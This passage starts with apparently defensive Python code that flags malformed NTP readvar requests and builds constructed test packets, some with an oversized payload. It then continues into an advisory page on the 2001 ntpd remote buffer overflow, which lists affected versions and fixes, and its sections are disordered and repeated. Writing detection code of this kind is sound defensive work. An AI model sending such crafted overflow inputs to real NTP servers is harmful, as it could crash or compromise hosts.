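    """Return finding codes for a readvar request; empty list means clean."""
    findings: List[str] = []
    hdr = parse_control_header(pkt)
    if hdr is None or hdr.is_response or hdr.opcode != OP_READVAR:
        return findings

    body = pkt[HEADER_LEN:]
    if hdr.count > len(body):
        findings.append("count-exceeds-data")
    if len(body) > hdr.count + MAX_TRAILER:
        # More bytes follow the declared data than padding/MAC can explain.
        findings.append("trailing-bytes")

    data = body[:hdr.count]
    # A readvar request carries a comma-separated ASCII variable list.
    if any((b < 0x20 and b not in (9, 10, 13)) or b > 0x7E for b in data):
        findings.append("non-printable")
    longest = max(len(item.strip()) for item in data.split(b","))
    if longest > MAX_ITEM_LEN:
        findings.append("oversized-item")
    return findings


def build_request(data: bytes, count: Optional[int] = None, seq: int = 1) -> bytes:
    """Build a constructed sample request (VN=2, mode=6, opcode readvar)."""
    count = len(data) if count is None else count
    return struct.pack("!BBHHHHH", 0x16, OP_READVAR, seq, 0, 0, 0, count) + data


# Constructed sample packets (not captured traffic).
BENIGN = build_request(b"stratum,offset" + b"\x00\x00", count=14)
OVERSIZED = build_request(b"stratum=" + b"A" * 300)
TRAILING = build_request(b"stratum=" + b"\xff" * 200, count=8)
BINARY = build_request(b"stratum=" + b"\xff" * 32)
CLIENT = b"\x1b" + b"\x00" * 47   # ordinary mode 3 time request

if __name__ == "__main__":
    for name, pkt in [("benign", BENIGN), ("oversized", OVERSIZED),
                      ("trailing", TRAILING), ("binary", BINARY),
                      ("client", CLIENT)]:
        print(f"{name:10s} {inspect_readvar(pkt)}")
```

Such a check supplements upgrading; it does not replace it, since the page states there are no known workarounds.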

- Timeline

2001-04-04 Unknown
2001-04-04 Unknown

- Solution

Contact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Ntpd Remote Buffer Overflow Vulnerability
Boundary Condition Error 2540
Yes No
2001-04-04 12:00:00 2007-11-05 05:05:00
This vulnerability was published in an exploit written by Przemyslaw Frasunek <venglin@freebsd.lublin.pl> and posted to Bugtraq on April 4, 2001.

- Affected program versions

Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.0 1
Dave Mills xntp3 5.93 e
Dave Mills xntp3 5.93 d
Dave Mills xntp3 5.93 c
Dave Mills xntp3 5.93 b
Dave Mills xntp3 5.93 a
Dave Mills xntp3 5.93
Dave Mills ntpd 4.0.99 k
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
- Slackware Linux 7.0
Dave Mills ntpd 4.0.99 j
Dave Mills ntpd 4.0.99 i
Dave Mills ntpd 4.0.99 h
Dave Mills ntpd 4.0.99 g
+ Debian Linux 2.2
Dave Mills ntpd 4.0.99 f
Dave Mills ntpd 4.0.99 e
Dave Mills ntpd 4.0.99 d
Dave Mills ntpd 4.0.99 c
Dave Mills ntpd 4.0.99 b
+ FreeBSD FreeBSD 4.2 -RELEASE
Dave Mills ntpd 4.0.99 a
Dave Mills ntpd 4.0.99
Cisco Voice Services Provisioning Tool
+ Sun Solaris 2.6
Cisco Virtual Switch Controller 3000
Cisco SC2200
Cisco PGW2200 PSTN Gateway
+ Sun Solaris 2.6
Cisco IP Manager 2.0
Cisco IP Manager 1.0
Cisco IOS 12.2YC
Cisco IOS 12.2YA
Cisco IOS 12.2XQ
Cisco IOS 12.2XQ
Cisco IOS 12.2XH
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XB
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.2S
Cisco IOS 12.2PI
Cisco IOS 12.2PB
Cisco IOS 12.2DA
Cisco IOS 12.2BX
Cisco IOS 12.2BW
Cisco IOS 12.2B
Cisco IOS 12.2
Cisco IOS 12.1YF
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XZ
Cisco IOS 12.1XY
Cisco IOS 12.1XX
Cisco IOS 12.1XW
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XS
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XK
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1EZ
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EC
Cisco IOS 12.1E
Cisco IOS 12.1DC
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1CX
Cisco IOS 12.1AA
Cisco IOS 12.1
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XJ
Cisco IOS 12.0XI
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XF
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0T
Cisco IOS 12.0ST
Cisco IOS 12.0SL
Cisco IOS 12.0SC
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0(7)XK
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(14)W5(20)
Cisco IOS 12.0(13)W5(19c)
Cisco IOS 12.0(10)W5(18g)
Cisco IOS 12.0
Cisco IOS 11.3XA
Cisco IOS 11.3WA4
Cisco IOS 11.3T
Cisco IOS 11.3NA
Cisco IOS 11.3MA
Cisco IOS 11.3HA
Cisco IOS 11.3DB
Cisco IOS 11.3DA
Cisco IOS 11.3AA
Cisco IOS 11.3
Cisco IOS 11.2XA
Cisco IOS 11.2WA4
Cisco IOS 11.2SA
Cisco IOS 11.2P
Cisco IOS 11.2GS
Cisco IOS 11.2F
Cisco IOS 11.2BC
Cisco IOS 11.2
Cisco IOS 11.1IA
Cisco IOS 11.1CT
Cisco IOS 11.1CC
Cisco IOS 11.1CA
Cisco IOS 11.1AA
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
Cisco BTS 10200
Cisco Billing and Management Server
+ Sun Solaris 2.6
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0
Cisco IOS 12.2DD
Cisco IOS 12.2(4)T
Cisco IOS 12.2(4)
Cisco IOS 12.2(3.4)BP
Cisco IOS 12.2(3)
Cisco IOS 12.2(2)XA1
Cisco IOS 12.2(2)XA
Cisco IOS 12.2(2)B
Cisco IOS 12.2(1b)
Cisco IOS 12.2(1.4)S
Cisco IOS 12.2(1.1)PI
Cisco IOS 12.2(1)XQ
Cisco IOS 12.2(1)XH
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XD1
Cisco IOS 12.1(9)AA
Cisco IOS 12.1(9)
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(7)EC
Cisco IOS 12.1(7)CX
Cisco IOS 12.1(6)EZ2
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YC1
Cisco IOS 12.1(5)YB4
Cisco IOS 12.1(5)XV3
Cisco IOS 12.1(5)XS2
Cisco IOS 12.1(5)XM4
Cisco IOS 12.1(5)T9
Cisco IOS 12.1(2)XF4
Cisco IOS 12.0WC
Cisco IOS 12.0(5)YB4
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(17)ST1
Cisco IOS 12.0(17)SL2
Apple Mac OS X 10.0.2

- Unaffected program versions

Cisco IOS 12.2DD
Cisco IOS 12.2(4)T
Cisco IOS 12.2(4)
Cisco IOS 12.2(3.4)BP
Cisco IOS 12.2(3)
Cisco IOS 12.2(2)XA1
Cisco IOS 12.2(2)XA
Cisco IOS 12.2(2)B
Cisco IOS 12.2(1b)
Cisco IOS 12.2(1.4)S
Cisco IOS 12.2(1.1)PI
Cisco IOS 12.2(1)XQ
Cisco IOS 12.2(1)XH
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XD1
Cisco IOS 12.1(9)AA
Cisco IOS 12.1(9)
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(7)EC
Cisco IOS 12.1(7)CX
Cisco IOS 12.1(6)EZ2
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YC1
Cisco IOS 12.1(5)YB4
Cisco IOS 12.1(5)XV3
Cisco IOS 12.1(5)XS2
Cisco IOS 12.1(5)XM4
Cisco IOS 12.1(5)T9
Cisco IOS 12.1(2)XF4
Cisco IOS 12.0WC
Cisco IOS 12.0(5)YB4
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(17)ST1
Cisco IOS 12.0(17)SL2
Apple Mac OS X 10.0.2

- Vulnerability discussion

NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP v4. The 'ntpd' daemon implementing version 3 is called 'xntp3'; the version implementing version 4 is called 'ntp'.

On UNIX systems, the 'ntpd' daemon is available to regularly synchronize system time with internet time servers.

Many versions of 'ntpd' are prone to a remotely exploitable buffer-overflow issue. A remote attacker may be able to crash the daemon or execute arbitrary code on the host.

If successful, the attacker may gain root access on the victim host or may deny NTP service on the affected host.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Przemyslaw Frasunek <venglin@freebsd.lublin.pl> has written an exploit for this vulnerability.

- Solution

Several vendors have released patches or upgrades for their distributions of 'ntpd' or software including code from 'ntpd'.

Please see the references for details.


Cisco IOS 12.0SC
  • Cisco IOS 12.0(16)SC


Cisco IOS 12.0XA
  • Cisco IOS 12.1(9)


Cisco IOS 12.1XD
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XQ
  • Cisco IOS 12.2(1b)


Cisco IOS 12.1XJ
  • Cisco IOS 12.1(5)YB4


Cisco IOS 12.1XI
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XS
  • Cisco IOS 12.1(5)XS2


Cisco IOS 12.2XE
  • Cisco IOS 12.2(1)XE


Cisco IOS 11.3WA4
  • Cisco IOS 12.0WA


Cisco IOS 12.0XB
  • Cisco IOS 12.1(9)


Cisco IOS 12.2S
  • Cisco IOS 12.2(1.4)S


Cisco IOS 12.1T
  • Cisco IOS 12.1(5)T9

  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XV
  • Cisco IOS 12.1(5)XV3


Sun Solaris 8_sparc

Cisco IOS 11.0
  • Cisco IOS 12.0(18)


Cisco IOS 12.0XG
  • Cisco IOS 12.1(9)


Cisco IOS 11.3HA
  • Cisco IOS 12.0(18)


Cisco IOS 12.0ST
  • Cisco IOS 12.0(17)ST1


Cisco IOS 12.1YD
  • Cisco IOS 12.1(5)YD2


Cisco IOS 12.0(14)W5(20)
  • Cisco IOS 12.0(18)W5(22)


Cisco IOS 12.0XS
  • Cisco IOS 12.1(8a)E


Cisco IOS 11.3
  • Cisco IOS 12.0(18)


Cisco IOS 12.1XM
  • Cisco IOS 12.1(5)XM4


Cisco IOS 11.2SA
  • Cisco IOS 12.0W


Cisco IOS 12.1AA
  • Cisco IOS 12.1(9)AA


Cisco IOS 11.3XA
  • Cisco IOS 12.0(18)


Cisco IOS 12.1XL
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XT
  • Cisco IOS 12.1(5)YB4


Cisco IOS 12.1EC
  • Cisco IOS 12.1(7)EC


Cisco IOS 11.1CC
  • Cisco IOS 11.1(36)CC2


Cisco IOS 12.0XU
  • Cisco IOS 12.0WC


Cisco IOS 11.2F
  • Cisco IOS 12.0(18)


Cisco IOS 12.1DC
  • Cisco IOS 12.2(2)B


Cisco IOS 11.2P
  • Cisco IOS 12.0(18)


Cisco IOS 12.0XN
  • Cisco IOS 12.1(9)


Cisco IOS 12.0XH
  • Cisco IOS 12.1(9)


Cisco IOS 12.0DC
  • Cisco IOS 12.1DC


Cisco IOS 12.0(10)W5(18g)
  • Cisco IOS 12.0(18)W5(22a)


Cisco IOS 12.0T
  • Cisco IOS 12.1(9)


Cisco IOS 11.3NA
  • Cisco IOS 12.1(9)


Cisco IOS 11.2
  • Cisco IOS 11.2(26a)


Cisco IOS 12.2XD
  • Cisco IOS 12.2(1)XD1


Cisco IOS 11.3AA
  • Cisco IOS 12.1(9)


Cisco IOS 12.1YB
  • Cisco IOS 12.1(5)YB4


Sun Solaris 7.0

Cisco IOS 11.1
  • Cisco IOS 12.0(18)


Cisco IOS 12.2XQ
  • Cisco IOS 12.2(1)XQ


Cisco IOS 11.2GS
  • Cisco IOS 12.0(18)


Cisco IOS 12.2PB
  • Cisco IOS 12.2(3.4)BP


Cisco IOS 11.1IA
  • Cisco IOS 12.2(3)


Cisco IOS 12.0XD
  • Cisco IOS 12.1(9)


Cisco IOS 12.1EY
  • Cisco IOS 12.1(6)EY


Cisco IOS 12.1XR
  • Cisco IOS 12.1(5)YD2


Cisco IOS 12.0XI
  • Cisco IOS 12.1(9)


Cisco IOS 12.0SL
  • Cisco IOS 12.0(17)SL2

  • Cisco IOS 12.0ST


Cisco IOS 12.1EX
  • Cisco IOS 12.1(8a)E


Cisco IOS 12.2T
  • Cisco IOS 12.2(4)T


Cisco IOS 12.0XC
  • Cisco IOS 12.1(9)


Cisco IOS 12.1XA
  • Cisco IOS 12.2(1b)

  • Cisco IOS 12.2(3)


Cisco IOS 12.1XW
  • Cisco IOS 12.2DD


Cisco IOS 12.2PI
  • Cisco IOS 12.2(1.1)PI


HP HP-UX 10.0 1
  • HP PHNE_23717


HP HP-UX 10.20
  • HP PHNE_23717


HP HP-UX 11.0

HP HP-UX (VVOS) 11.0.4
  • HP PHNE_24077


HP HP-UX 11.11
  • HP PHNE_22722


Dave Mills ntpd 4.0.99 h

Dave Mills ntpd 4.0.99 b

Dave Mills ntpd 4.0.99 j

Dave Mills ntpd 4.0.99 i

Dave Mills ntpd 4.0.99 f

Dave Mills ntpd 4.0.99 k

Dave Mills ntpd 4.0.99 d

Dave Mills ntpd 4.0.99

Dave Mills ntpd 4.0.99 g

Dave Mills xntp3 5.93 e

Dave Mills xntp3 5.93 d

Dave Mills xntp3 5.93 b

Dave Mills xntp3 5.93 c

- Related references

 

 
